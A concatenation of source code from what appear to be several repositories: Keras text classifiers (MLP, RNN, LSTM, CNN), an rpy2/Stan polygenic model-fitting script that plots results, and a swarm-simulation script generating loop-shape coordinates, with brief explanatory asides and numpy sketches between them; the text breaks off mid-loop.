str_output+="Recall@2: "+str(urecall_at_2)+"\n"
str_output+="Recall@5: "+str(urecall_at_5)+"\n"
str_output+="Recall@10: "+str(urecall_at_10)+"\n\n"
str_output+= "-------SUMMARY---------\n\n"
str_output+=str(x)
#print str(x)
labels = [self.labelsi[l] for l in predicted_output]
# print [self.labelsi[lid] for lid in predicted_output]
return str_output, list_summary, labels
class LogisticRegressionHP(ModelHP):
"""
A logistic regression implemented with Keras
"""
def __init__(self,conf,forms, labels, options):
self.name_classifier = "HP_MLR"
self.iforms = {w:self.INIT_REAL_INDEX+i for i,w in enumerate(sorted(forms))}
self.conf = conf
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
self.n_labels = len(self.ilabels)
model = Sequential()
model.add(Dense(self.n_labels, input_dim=len(self.iforms)+len(self.SPECIAL_INDEXES), activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer="adam",#keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False),#'sgd',
metrics=['accuracy'])
self.model = model
self.options = options
class PerceptronHP(ModelHP):
def __init__(self,conf, vocab,labels, options):
self.name_classifier = "HP_MLP"
self.conf = conf
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.n_labels = len(self.ilabels)
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
self.iforms = {w:self.INIT_REAL_INDEX+i for i,w in enumerate(sorted(vocab))}
input_iw = Input(shape=(len(self.iforms)+len(self.SPECIAL_INDEXES),), name="input", dtype='float32')
x = input_iw
for l in range(0,int(self.conf[LAYERS])):
x = Dense(int(self.conf[NEURONS]))(x)
x = Dropout(float(self.conf[DROPOUT]))(x)
x = Activation('relu')(x)
x = Dense(self.n_labels)(x)
output = Activation('softmax', name='output')(x)
model = Model(inputs = [input_iw], outputs = [output])
model.compile(loss="categorical_crossentropy",
optimizer="adam",#keras.optimizers.SGD(lr=0.01, momentum=0.0, decay=1e-6, nesterov=False),
metrics=['accuracy'])
self.model = model
self.options = options
class SequenceModelHP(ModelHP):
def _get_indexes(self,sentence):
input = []
input_ext = []
for word in sentence:
index = self.UNK_WORD_INDEX
if word in self.iforms and self.vocab[word] > 1:
index = self.iforms[word]
elif word.lower() in self.iforms and self.vocab[word] > 1:
index = self.iforms[word.lower()]
input.append(index)
index = self.UNK_WORD_INDEX
if word in self.ieforms:
index = self.ieforms[word]
elif word.lower() in self.ieforms:
index = self.ieforms[word.lower()]
input_ext.append(index)
return np.array(input), np.array(input_ext)
def generate_data_test(self, lines, batch_size):
i = 0
while i < len(lines):
batch_sample = 0
x = []
x_ext = []
y = []
while batch_sample < batch_size and i<len(lines):
ls = lines[i].split('\t')
y.append(self.ilabels[ls[1]])
sample = []
sample = ls[2].split()[-self.sequence_length:]
x1,x2 = self._get_indexes(sample)
x.append(x1)
x_ext.append(x2)
batch_sample+=1
i+=1
x = keras.preprocessing.sequence.pad_sequences(x, maxlen=self.sequence_length, dtype='int32',
truncating='pre', value=0.)
            x_ext = keras.preprocessing.sequence.pad_sequences(x_ext, maxlen=self.sequence_length, dtype='int32',
                                                               truncating='pre', value=0.)
x = np.array(x)
x_ext = np.array(x_ext)
y = keras.utils.to_categorical(y, num_classes = len(self.ilabels))
if batch_size == 1:
y.reshape(-1,batch_size,y.shape[1])
yield ([x,x_ext],[y])
    def generate_data(self, lines, batch_size):
        i = 0
        while True:
            batch_sample = 0
            x = []
            x_ext = []
            y = []
            while batch_sample < batch_size:
                if i >= len(lines):
                    i = 0  # wrap around to the start for the next epoch
                ls = lines[i].split('\t')
                y.append(self.ilabels[ls[1]])
                sample = ls[2].split()[-self.sequence_length:]
                x1, x2 = self._get_indexes(sample)
                x.append(x1)
                x_ext.append(x2)
                batch_sample += 1
                i += 1
            x = keras.preprocessing.sequence.pad_sequences(x, maxlen=self.sequence_length, dtype='int32',
                                                           truncating='pre', value=0.)
            # pad the external-embedding indexes, not x a second time
            x_ext = keras.preprocessing.sequence.pad_sequences(x_ext, maxlen=self.sequence_length, dtype='int32',
                                                               truncating='pre', value=0.)
            x = np.array(x)
            x_ext = np.array(x_ext)
            y = keras.utils.to_categorical(y, num_classes=len(self.ilabels))
            yield ([x, x_ext], [y])
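Both generators rely on `pad_sequences(..., truncating='pre')` (padding defaults to `'pre'` as well): sequences longer than `maxlen` keep their last `maxlen` indexes, and shorter ones are filled with zeros on the left. A minimal pure-numpy sketch of that semantics, with a hypothetical helper name `pad_pre`:

```python
import numpy as np

def pad_pre(seqs, maxlen, value=0):
    """Left-pad and left-truncate integer index sequences to a fixed length,
    mirroring pad_sequences(..., padding='pre', truncating='pre')."""
    out = np.full((len(seqs), maxlen), value, dtype='int32')
    for r, seq in enumerate(seqs):
        seq = seq[-maxlen:]                   # 'pre' truncation keeps the last maxlen items
        out[r, maxlen - len(seq):] = seq      # 'pre' padding fills zeros on the left
    return out

batch = pad_pre([[4, 5, 6, 7], [8, 9]], maxlen=3)
print(batch)   # -> [[5 6 7]
               #     [0 8 9]]
```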
class RNNHP(SequenceModelHP):

    def __init__(self, conf, vocab, labels, options):
        self.vocab = vocab
        self.name_classifier = "HP_RNN"
        self.conf = conf
        self.ilabels = {l: i for i, l in enumerate(sorted(labels))}
        self.n_labels = len(self.ilabels)
        self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
        self.iforms = {w: self.INIT_REAL_INDEX + i for i, w in enumerate(sorted(vocab))}
        self.dims = int(self.conf[DIM_EMBEDDINGS])
        self.w_lookup = np.zeros(shape=(len(vocab) + len(self.SPECIAL_INDEXES), self.dims))
        self.ieforms, self.ew_lookup, self.edims = model_utils._read_embedding_file(self.conf[EXTERNAL_EMBEDDINGS])
        self.iforms_reverse = {self.iforms[w]: w for w in self.iforms}
        self.ieforms_reverse = {self.ieforms[w]: w for w in self.ieforms}
        self.sequence_length = int(self.conf[TIMESTEPS])
        input = Input(shape=(self.sequence_length,), dtype='float32')
        input_ext = Input(shape=(self.sequence_length,), dtype='float32')
        embedding_layer = Embedding(self.w_lookup.shape[0],
                                    self.dims,
                                    embeddings_initializer="glorot_uniform",
                                    input_length=self.sequence_length,
                                    name="e_IW",
                                    trainable=True)(input)
        e_embedding_layer = Embedding(self.ew_lookup.shape[0],
                                      self.edims,
                                      weights=[self.ew_lookup],
                                      input_length=self.sequence_length,
                                      name="e_EW",
                                      trainable=True)(input_ext)
        x = keras.layers.concatenate([embedding_layer, e_embedding_layer], axis=-1)
        dr = float(self.conf[DROPOUT])
        for l in range(0, int(self.conf[LAYERS])):
            # return full sequences from every recurrent layer except the last,
            # so stacked SimpleRNN layers receive the 3-D input they expect
            if l < int(self.conf[LAYERS]) - 1:
                sequences = True
            else:
                sequences = False
            x = SimpleRNN(int(self.conf[NEURONS]), return_sequences=sequences, dropout=dr)(x)
        for l in range(0, int(self.conf[MLP_LAYERS])):
            x = Dense(int(self.conf[MLP_NEURONS]))(x)
            x = Dropout(float(self.conf[DROPOUT]))(x)
            x = Activation('relu')(x)
        preds = Dense(self.n_labels, activation='softmax')(x)
        model = Model(inputs=[input, input_ext], outputs=[preds])
        model.compile(loss='categorical_crossentropy',
                      optimizer='adam',
                      metrics=['accuracy'])
        self.model = model
        self.options = options
class LSTMHP(SequenceModelHP):

    def __init__(self, conf, vocab, labels, options):
        self.vocab = vocab
        self.name_classifier = "HP_LSTM"
        self.conf = conf
        self.ilabels = {l: i for i, l in enumerate(sorted(labels))}
        self.n_labels = len(self.ilabels)
        self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
        self.iforms = {w: self.INIT_REAL_INDEX + i for i, w in enumerate(sorted(vocab))}
        self.dims = int(self.conf[DIM_EMBEDDINGS])
        self.w_lookup = np.zeros(shape=(len(vocab) + len(self.SPECIAL_INDEXES), self.dims))
        self.ieforms, self.ew_lookup, self.edims = model_utils._read_embedding_file(self.conf[EXTERNAL_EMBEDDINGS])
        self.iforms_reverse = {self.iforms[w]: w for w in self.iforms}
        self.ieforms_reverse = {self.ieforms[w]: w for w in self.ieforms}
        self.sequence_length = int(self.conf[TIMESTEPS])
        input = Input(shape=(self.sequence_length,), dtype='float32')
        input_ext = Input(shape=(self.sequence_length,), dtype='float32')
        embedding_layer = Embedding(self.w_lookup.shape[0],
                                    self.dims,
                                    embeddings_initializer="glorot_uniform",
                                    input_length=self.sequence_length,
                                    name="e_IW",
                                    trainable=True)(input)
        e_embedding_layer = Embedding(self.ew_lookup.shape[0],
                                      self.edims,
                                      weights=[self.ew_lookup],
                                      input_length=self.sequence_length,
                                      name="e_EW",
                                      trainable=True)(input_ext)
        x = keras.layers.concatenate([embedding_layer, e_embedding_layer], axis=-1)
        bidirectional = self.conf[BIDIRECTIONAL].lower() == "true"
        dr = float(self.conf[DROPOUT])
        for l in range(1, int(self.conf[LAYERS]) + 1):
            # return full sequences from every recurrent layer except the last
            if l < int(self.conf[LAYERS]):
                sequences = True
            else:
                sequences = False
            if bidirectional:
                x = Bidirectional(LSTM(int(self.conf[NEURONS]), dropout=dr, recurrent_dropout=dr,
                                       return_sequences=sequences))(x)
            else:
                x = LSTM(int(self.conf[NEURONS]), dropout=dr,  # recurrent_dropout=dr,
                         return_sequences=sequences)(x)
        for l in range(0, int(self.conf[MLP_LAYERS])):
            x = Dense(int(self.conf[MLP_NEURONS]))(x)
            x = Dropout(float(self.conf[DROPOUT]))(x)
            x = Activation('relu')(x)
        preds = Dense(self.n_labels, activation='softmax')(x)
        model = Model(inputs=[input, input_ext], outputs=[preds])
        model.compile(loss='categorical_crossentropy',
                      optimizer="adam",  # keras.optimizers.Adam(lr=1e-3, decay=0), keras.optimizers.SGD(lr=0.01, momentum=0.7, decay=0.0, nesterov=False),
                      metrics=['accuracy'])
        model.summary()
        self.model = model
        self.options = options
class CNNHP(SequenceModelHP):

    def __init__(self, conf, vocab, labels, options):
        self.vocab = vocab
        self.name_classifier = "HP_CNN"
        self.conf = conf
        self.ilabels = {l: i for i, l in enumerate(sorted(labels))}
        self.n_labels = len(self.ilabels)
        self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
        self.iforms = {w: self.INIT_REAL_INDEX + i for i, w in enumerate(sorted(vocab))}
        self.dims = int(self.conf[DIM_EMBEDDINGS])
        self.w_lookup = np.zeros(shape=(len(vocab) + len(self.SPECIAL_INDEXES), self.dims))
        self.ieforms, self.ew_lookup, self.edims = model_utils._read_embedding_file(self.conf[EXTERNAL_EMBEDDINGS])
        self.iforms_reverse = {self.iforms[w]: w for w in self.iforms}
        self.ieforms_reverse = {self.ieforms[w]: w for w in self.ieforms}
        self.sequence_length = int(self.conf[TIMESTEPS])
        input = Input(shape=(self.sequence_length,), dtype='float32')
        input_ext = Input(shape=(self.sequence_length,), dtype='float32')
        embedding_layer = Embedding(self.w_lookup.shape[0],
                                    self.dims,
                                    embeddings_initializer="glorot_uniform",
                                    # weights=[self.w_lookup],
                                    input_length=self.sequence_length,
                                    name="e_IW",
                                    trainable=True)(input)
        e_embedding_layer = Embedding(self.ew_lookup.shape[0],
                                      self.edims,
                                      weights=[self.ew_lookup],
                                      input_length=self.sequence_length,
                                      name="e_EW",
                                      trainable=True)(input_ext)
        x = keras.layers.concatenate([embedding_layer, e_embedding_layer], axis=-1)
        dr = float(self.conf[DROPOUT])
        filters = int(self.conf[FILTERS])
        kernel_size = int(self.conf[KERNEL_SIZE])
        # add Conv1D layers, which learn word-group filters of size kernel_size
        for l in range(0, int(self.conf[LAYERS])):
            x = Conv1D(filters,
                       kernel_size,
                       padding='valid',
                       activation='relu',
                       strides=1)(x)
        x = GlobalMaxPooling1D()(x)
        for l in range(0, int(self.conf[MLP_LAYERS])):
            x = Dense(int(self.conf[MLP_NEURONS]))(x)
            x = Dropout(float(self.conf[DROPOUT]))(x)
            x = Activation('relu')(x)
        preds = Dense(self.n_labels, activation='softmax')(x)
        model = Model(inputs=[input, input_ext], outputs=[preds])
        model.compile(loss='categorical_crossentropy',
                      optimizer='adam',
                      metrics=['accuracy'])
        model.summary()
        self.model = model
# ---- gbe_browser/optimized.py (repo: whyrg/GlobalBiobankEngine, license: MIT) ----
from __future__ import print_function
from __future__ import division
from random import shuffle
# Written by Manuel A. Rivas
# Updated 04.21.2017
import sys,re
import os
import numpy
import rpy2.robjects as ro
import rpy2.robjects.numpy2ri
rpy2.robjects.numpy2ri.activate()
def Polygenic(key, betas, ses, labels, chains=8, iter=200, warmup=100, cores=8):
    nstudies = len(labels)
    labels = numpy.array(labels)
    betas = numpy.array(betas)
    ses = numpy.array(ses)
    fn = 'static/images/Polygenic/Polygenic_' + str(key) + '.svg'
    ro.r('''
covarr<-function(nstudies, fn, betas, ses, labels, chains, iter, warmup, cores){
library(rstan)
require(ggplot2)
require(corpcor)
require(RColorBrewer)
library(ggthemes)
# Create data for Stan
stan.data <- list(
N = nrow(betas),
M = ncol(betas),
B = betas,
SE = ses,
K = 2
)
sm <- stan_model(file = "model2_mixture.stan")
fit2 = optimizing(sm, data = stan.data, hessian = TRUE, as_vector=FALSE)
#fit2 = vb(sm, data = stan.data)
#print(fit2)
# fit2 <- stan(
# file = "model2_mixture.stan", # Stan program
# data = stan.data, # named list of data
# chains = 8, # number of Markov chains
# warmup = 100, # number of warmup iterations per chain
# iter = iter, # total number of iterations per chain
# cores = 8, # number of cores (using 2 just for the vignette)
# refresh = 50 # show progress every 'refresh' iterations
# )
#print(fit2, pars=c("L_Omega", "L_Theta", "tau", "pi","Omegacor","Thetacor"), probs=c(0.025, 0.5, 0.975), digits_summary=5)
#print(fit2, pars=c("L_Omega", "L_Theta", "tau", "pi","Omegacor","Thetacor"), digits_summary=5)
#print(fit2, pars = c("L_omega","L_Theta","tau","pi","Omegacor","Thetacor"))
print(fit2$par$pi)
print(fit2$par$Omegacor)
print(fit2$par$Thetacor)
print(labels)
#mylabels = c("tau","pi", rev(labels),"Thetacor")
#mylabels = c(rep(1,nstudies),rep(1,2),rep(1,nstudies*nstudies),rep(1,nstudies*nstudies))
#d = cbind(rep("tau_",nstudies),rev(labels))
#colnames(d) = c("id","val")
#d = data.frame(d)
#mylabels[1:nstudies] = with(d,paste0(id,val))
#mylabels[nstudies+1] = "pi_m1"
#mylabels[nstudies+2] = "pi_null"
#labelsrev = rev(labels)
#init = nstudies + 2
#for(i in 1:nstudies){
# for(j in 1:nstudies){
# init = init + 1
# mylabels[init] = paste(c("cor_e_", labelsrev[j], "_", labelsrev[i]), sep = "", collapse="")
#}
#}
#for(i in 1:nstudies){
# for(j in 1:nstudies){
# init = init + 1
# mylabels[init] = paste(c("cor_g_", labelsrev[j], "_", labelsrev[i]), sep = "", collapse="")
#}
#}
#print(mylabels)
#p.1 <- plot(fit2, pars=c("Omegacor", "Thetacor", "pi", "tau"))
#p.1 <- p.1 + scale_y_continuous(labels = mylabels, breaks = seq(1,length(mylabels))) + theme_wsj() + scale_colour_wsj("colors6", "")
#ggsave(fn, plot = p.1, width = 8, height = 8, device = "svg")
#p.2 <- traceplot(fit2, pars = c( "tau","pi","Omegacor","Thetacor"), inc_warmup = TRUE, nrow = 5) + theme_wsj() + scale_colour_wsj("colors6", "")
#ggsave(paste(c(fn,2,".svg"), sep = "", collapse=""), plot = p.2, width = 8, height = 8, device = "svg")
## extract the simulated draws from the posterior and note the number for nsims
#theta = extract(fit2)
#print(names(theta))
#nsims = length(theta$Sigmas)
#print(nsims)
#print(dim(theta$Sigmas))
#save.image(paste(fn, ".RData", sep=""))
    }
    ''')
    covarf = ro.r['covarr']
    res = covarf(nstudies, fn, betas, ses, labels, chains, iter, warmup, cores)
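Inside `covarr()` the Stan data list sets `N = nrow(betas)` and `M = ncol(betas)`, so the Python caller must pass effect sizes as an N-by-M array (one row per variant, one column per study) with standard errors of the same shape. A toy sketch of such inputs — the study names and values are purely hypothetical:

```python
import numpy as np

labels = ["studyA", "studyB"]                # hypothetical study names (M = 2)
betas = np.array([[ 0.10,  0.12],
                  [-0.05, -0.02],
                  [ 0.00,  0.01],
                  [ 0.30,  0.25]])           # effect sizes, one row per variant (N = 4)
ses = np.abs(betas) * 0.5 + 0.01             # toy standard errors, same shape as betas
print(betas.shape, ses.shape)                # -> (4, 2) (4, 2)
```

Arrays shaped like these would then be handed to `Polygenic(key, betas, ses, labels)`.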
## START NEW
def PolygenicCoding(key, betas, ses, labels, chains=8, iter=200, warmup=100, cores=8):
    nstudies = len(labels)
    labels = numpy.array(labels)
    betas = numpy.array(betas)
    ses = numpy.array(ses)
    fn = 'static/images/PolygenicCoding/PolygenicCoding_' + str(key) + '.svg'
    ro.r('''
covarr<-function(nstudies, fn, betas, ses, labels, chains, iter, warmup, cores){
library(rstan)
require(ggplot2)
require(RColorBrewer)
library(ggthemes)
require(svglite)
# Create data for Stan
stan.data <- list(
N = nrow(betas),
M = ncol(betas),
B = betas,
SE = ses,
K = 2
)
sm <- stan_model(file = "model2_mixture.stan")
#fit2 = optimizing(sm, data = stan.data, hessian = TRUE, as_vector=FALSE)
#fit2 = vb(sm, data = stan.data)
#print(fit2)
  fit2 <- stan(
    file = "model2_mixture.stan",  # Stan program
    data = stan.data,              # named list of data
    chains = chains,               # number of Markov chains
    warmup = warmup,               # number of warmup iterations per chain
    iter = iter,                   # total number of iterations per chain
    cores = cores,                 # number of cores
    refresh = 50                   # show progress every 'refresh' iterations
  )
print(fit2, pars=c("L_Omega", "L_Theta", "tau", "pi","Omegacor","Thetacor"), probs=c(0.025, 0.5, 0.975), digits_summary=5)
#print(fit2$par$pi)
#print(fit2$par$Omegacor)
#print(fit2$par$Thetacor)
#print(labels)
mylabels = c("tau","pi", rev(labels),"Thetacor")
mylabels = c(rep(1,nstudies),rep(1,2),rep(1,nstudies*nstudies),rep(1,nstudies*nstudies))
d = cbind(rep("tau_",nstudies),rev(labels))
colnames(d) = c("id","val")
d = data.frame(d)
mylabels[1:nstudies] = with(d,paste0(id,val))
mylabels[nstudies+1] = "pi_m1"
mylabels[nstudies+2] = "pi_null"
labelsrev = rev(labels)
init = nstudies + 2
for(i in 1:nstudies){
for(j in 1:nstudies){
init = init + 1
mylabels[init] = paste(c("cor_e_", labelsrev[j], "_", labelsrev[i]), sep = "", collapse="")
}
}
for(i in 1:nstudies){
for(j in 1:nstudies){
init = init + 1
mylabels[init] = paste(c("cor_g_", labelsrev[j], "_", labelsrev[i]), sep = "", collapse="")
}
}
print(mylabels)
p.1 <- plot(fit2, pars=c("Omegacor", "Thetacor", "pi", "tau"))
p.1 <- p.1 + scale_y_continuous(labels = mylabels, breaks = seq(1,length(mylabels))) + theme_wsj() + scale_colour_wsj("colors6","")
#p.1 <- p.1 + scale_y_continuous(labels = mylabels, breaks = seq(1,length(mylabels))) + theme_hc() + scale_colour_hc("colors6", "")
# svg(file = fn, width = 8, height = 8)
# p.1
# dev.off()
p.2 <- traceplot(fit2, pars = c( "tau","pi","Omegacor","Thetacor"), inc_warmup = TRUE, nrow = 5) + theme_wsj() + scale_colour_wsj("colors6", "")
# svg(file = paste(c(fn,2,".svg"), sep = "", collapse=""), width = 8, height = 8)
# p.2
# dev.off()
ggsave(fn, plot = p.1, width = 8, height = 8, device = "svg")
ggsave(paste(c(fn,2,".svg"), sep = "", collapse=""), plot = p.2, width = 8, height = 8, device = "svg")
## extract the simulated draws from the posterior and note the number for nsims
#theta = extract(fit2)
#print(names(theta))
#nsims = length(theta$Sigmas)
#print(nsims)
#print(dim(theta$Sigmas))
#save.image(paste(fn, ".RData", sep=""))
    }
    ''')
    covarf = ro.r['covarr']
    res = covarf(nstudies, fn, betas, ses, labels, chains, iter, warmup, cores)
# ---- loop-data2/shape_gen_script.py (repo: yangliu28/swarm_formation_sim, license: MIT) ----
# each block of code generates one loop shape
import pickle
import os
import math
import pygame
import numpy as np
# general function to reset radian angle to [-pi, pi)
def reset_radian(radian):
    while radian >= math.pi:
        radian = radian - 2*math.pi
    while radian < -math.pi:
        radian = radian + 2*math.pi
    return radian
# general function to calculate next position node along a heading direction
def cal_next_node(node_poses, index_curr, heading_angle, rep_times):
    for _ in range(rep_times):
        index_next = index_curr + 1
        x = node_poses[index_curr][0] + 1.0*math.cos(heading_angle)
        y = node_poses[index_curr][1] + 1.0*math.sin(heading_angle)
        node_poses[index_next] = np.array([x, y])
        index_curr = index_next
    return index_next
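As a quick sanity check of the two helpers, the sketch below traces a small L-shaped path: three unit steps east, a 90-degree left turn normalized by `reset_radian`, then two unit steps north. The helper definitions are repeated here so the snippet runs on its own.

```python
import math
import numpy as np

def reset_radian(radian):
    # wrap an angle into [-pi, pi), same as the helper above
    while radian >= math.pi:
        radian = radian - 2*math.pi
    while radian < -math.pi:
        radian = radian + 2*math.pi
    return radian

def cal_next_node(node_poses, index_curr, heading_angle, rep_times):
    # place rep_times unit-length nodes along heading_angle, same as the helper above
    for _ in range(rep_times):
        index_next = index_curr + 1
        x = node_poses[index_curr][0] + 1.0*math.cos(heading_angle)
        y = node_poses[index_curr][1] + 1.0*math.sin(heading_angle)
        node_poses[index_next] = np.array([x, y])
        index_curr = index_next
    return index_next

poses = np.zeros((6, 2))
idx = cal_next_node(poses, 0, 0.0, 3)        # three unit steps heading east
heading = reset_radian(0.0 + math.pi/2)      # turn left 90 degrees
idx = cal_next_node(poses, idx, heading, 2)  # two unit steps heading north
print(idx, poses[idx])                       # idx is 5; poses[idx] is approximately [3., 2.]
```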
# ##### script to generate 30-square #####
# filename = '30-square'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# x = 0.0
# y = 0.0
# # bottom side line
# # first node starting from bottom left corner
# node_poses[0] = np.array([0.0, 0.0])
# for i in range(1,8):
# x = x + 1.0
# node_poses[i] = np.array([x,y])
# # right line line
# x = x + 1.0 / math.sqrt(2)
# y = y + 1.0 / math.sqrt(2)
# node_poses[8] = np.array([x,y])
# for i in range(9,16):
# y = y + 1.0
# node_poses[i] = np.array([x,y])
# # top side line
# for i in range(16,23):
# x = x - 1.0
# node_poses[i] = np.array([x,y])
# # left side line
# x = x - 1.0 / math.sqrt(2)
# y = y - 1.0 / math.sqrt(2)
# node_poses[23] = np.array([x,y])
# for i in range(24,30):
# y = y - 1.0
# node_poses[i] = np.array([x,y])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-square #####
# filename = '100-square'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# x = 0.0
# y = 0.0
# # bottom side line
# node_poses[0] = np.array([0.0, 0.0])
# for i in range(1,26):
# x = x + 1.0
# node_poses[i] = np.array([x,y])
# # right line line
# for i in range(26,51):
# y = y + 1.0
# node_poses[i] = np.array([x,y])
# # top side line
# for i in range(51,76):
# x = x - 1.0
# node_poses[i] = np.array([x,y])
# # left side line
# for i in range(76,100):
# y = y - 1.0
# node_poses[i] = np.array([x,y])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-circle #####
# filename = '30-circle'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# center = np.zeros(2)
# radius = 0.5 / math.sin(math.pi/swarm_size)
# # first node starting from left most position
# for i in range(swarm_size):
# ori = -math.pi + 2*math.pi/swarm_size * i
# node_poses[i] = center + np.array([radius*math.cos(ori), radius*math.sin(ori)])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-circle #####
# filename = '100-circle'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# center = np.zeros(2)
# radius = 0.5 / math.sin(math.pi/swarm_size)
# # first node starting from left most position
# for i in range(swarm_size):
# ori = -math.pi + 2*math.pi/swarm_size * i
# node_poses[i] = center + np.array([radius*math.cos(ori), radius*math.sin(ori)])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-triangle #####
# filename = '30-triangle'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# # first node is at bottom left corner
# x = 0.0
# y = 0.0
# node_poses[0] = np.array([x,y])
# for i in range(1,11):
# x = x + 1.0
# node_poses[i] = np.array([x,y])
# for i in range(11,21):
# x = x + 1.0 * math.cos(math.pi*2/3)
# y = y + 1.0 * math.sin(math.pi*2/3)
# node_poses[i] = np.array([x,y])
# for i in range(21, 30):
# x = x + 1.0 * math.cos(-math.pi*2/3)
# y = y + 1.0 * math.sin(-math.pi*2/3)
# node_poses[i] = np.array([x,y])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-triangle #####
# filename = '100-triangle'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# side_angle = math.acos(17.0/33.0)
# # first node is at bottom left corner
# x = 0.0
# y = 0.0
# node_poses[0] = np.array([x,y])
# for i in range(1,35):
# x = x + 1.0
# node_poses[i] = np.array([x,y])
# for i in range(35,68):
# x = x + 1.0 * math.cos(math.pi-side_angle)
# y = y + 1.0 * math.sin(math.pi-side_angle)
# node_poses[i] = np.array([x,y])
# for i in range(68, 100):
# x = x + 1.0 * math.cos(-math.pi+side_angle)
# y = y + 1.0 * math.sin(-math.pi+side_angle)
# node_poses[i] = np.array([x,y])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-star #####
# filename = '30-star'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# outer_angle = 2*math.pi / 5.0
# devia_right = outer_angle
# devia_left = 2*outer_angle
# # first node is at bottom left corner
# heading_angle = outer_angle / 2.0 # current heading
# heading_dir = 0 # current heading direction: 0 for left, 1 for right
# seg_count = 0 # current segment count
# for i in range(1,swarm_size):
# node_poses[i] = (node_poses[i-1] +
# np.array([math.cos(heading_angle), math.sin(heading_angle)]))
# seg_count = seg_count + 1
# if seg_count == 3:
# seg_count = 0
# if heading_dir == 0:
# heading_angle = reset_radian(heading_angle - devia_right)
# heading_dir = 1
# else:
# heading_angle = reset_radian(heading_angle + devia_left)
# heading_dir = 0
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-star #####
# filename = '100-star'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# outer_angle = 2*math.pi / 5.0
# devia_right = outer_angle
# devia_left = 2*outer_angle
# # first node is at bottom left corner
# heading_angle = outer_angle / 2.0 # current heading
# heading_dir = 0 # current heading direction: 0 for left, 1 for right
# seg_count = 0 # current segment count
# for i in range(1,swarm_size):
# node_poses[i] = (node_poses[i-1] +
# np.array([math.cos(heading_angle), math.sin(heading_angle)]))
# seg_count = seg_count + 1
# if seg_count == 10:
# seg_count = 0
# if heading_dir == 0:
# heading_angle = reset_radian(heading_angle - devia_right)
# heading_dir = 1
# else:
# heading_angle = reset_radian(heading_angle + devia_left)
# heading_dir = 0
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-airplane #####
# filename = '30-airplane'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# # first node is at bottom center
# node_index = 0 # current sitting node
# heading_angle = - (14.0*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (130.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle - (42.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle - (94.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (106.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (55.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle - (35.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # half the airplane constructed, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,15):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-airplane #####
# filename = '100-airplane'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# # first node is at bottom center
# node_index = 0 # current sitting node
# heading_angle = - (18.0*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = reset_radian(heading_angle + (135.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle - (42.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = reset_radian(heading_angle - (94.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 9)
# heading_angle = reset_radian(heading_angle + (106.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle + (55.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 12)
# heading_angle = reset_radian(heading_angle - (40.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# # half the airplane constructed, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,50):
# old_vect = node_poses[i] - node_poses[0]
